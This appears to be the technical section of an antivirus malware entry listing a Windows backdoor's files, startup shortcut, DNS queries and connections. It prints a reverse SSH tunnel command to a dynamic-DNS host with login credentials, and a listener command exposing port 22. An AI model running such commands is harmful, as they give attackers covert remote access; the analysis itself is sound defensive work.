Техническая информация
- %ALLUSERSPROFILE%\Start Menu\Programs\Startup\Mozila.lnk
- 'C:\Default\ComSystem.exe' -ssh -R 7760:127.0.0.2:22 55http.myvnc.com -l 55http -pw 2n16122N
- 'C:\Default\Surrogate.exe' -d -t -l -e0.0.0.0 -i127.0.0.2 -p22 -a
- '<SYSTEM32>\wscript.exe' "C:\Default\Surrogate.vbe"
- C:\Default\Surrogate.vbe
- C:\Default\Surrogate.exe
- %TEMP%\~SB9.tmp
- C:\Default\ComSystem.exe
- <LS_APPDATA>\PUTTY.RND
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\supersize[1].pl
- C:\Default\image hosting.url
- %TEMP%\image hosting.0001
- %TEMP%\LSB3.tmp
- %TEMP%\~SB4.tmp
- %TEMP%\LSB1.tmp
- %TEMP%\LSB2.tmp
- %TEMP%\~SB7.tmp
- %TEMP%\~SB8.tmp
- %TEMP%\~SB5.tmp
- %TEMP%\~SB6.tmp
- %TEMP%\f6d12340-ca7f-11e3-4823-0002ba3e0029\x64.exe
- %TEMP%\~SB4.tmp
- %TEMP%\LSB3.tmp
- %TEMP%\LSB2.tmp
- %TEMP%\~SB6.tmp
- %TEMP%\~SB8.tmp
- %TEMP%\LSB1.tmp
- %TEMP%\~SB5.tmp
- %TEMP%\~SB9.tmp
- %TEMP%\~SB7.tmp в %TEMP%\f6d12340-ca7f-11e3-4823-0002ba3e0029\x64.exe
- 'www.us#.com':80
- '55####.myvnc.com':22
- 'localhost':1036
- www.us#.com/supersize.pl?se######################
- DNS ASK www.us#.com
- DNS ASK 55####.myvnc.com
- ClassName: 'MS_AutodialMonitor' WindowName: '(null)'
- ClassName: 'MS_WebcheckMonitor' WindowName: '(null)'
- ClassName: '' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'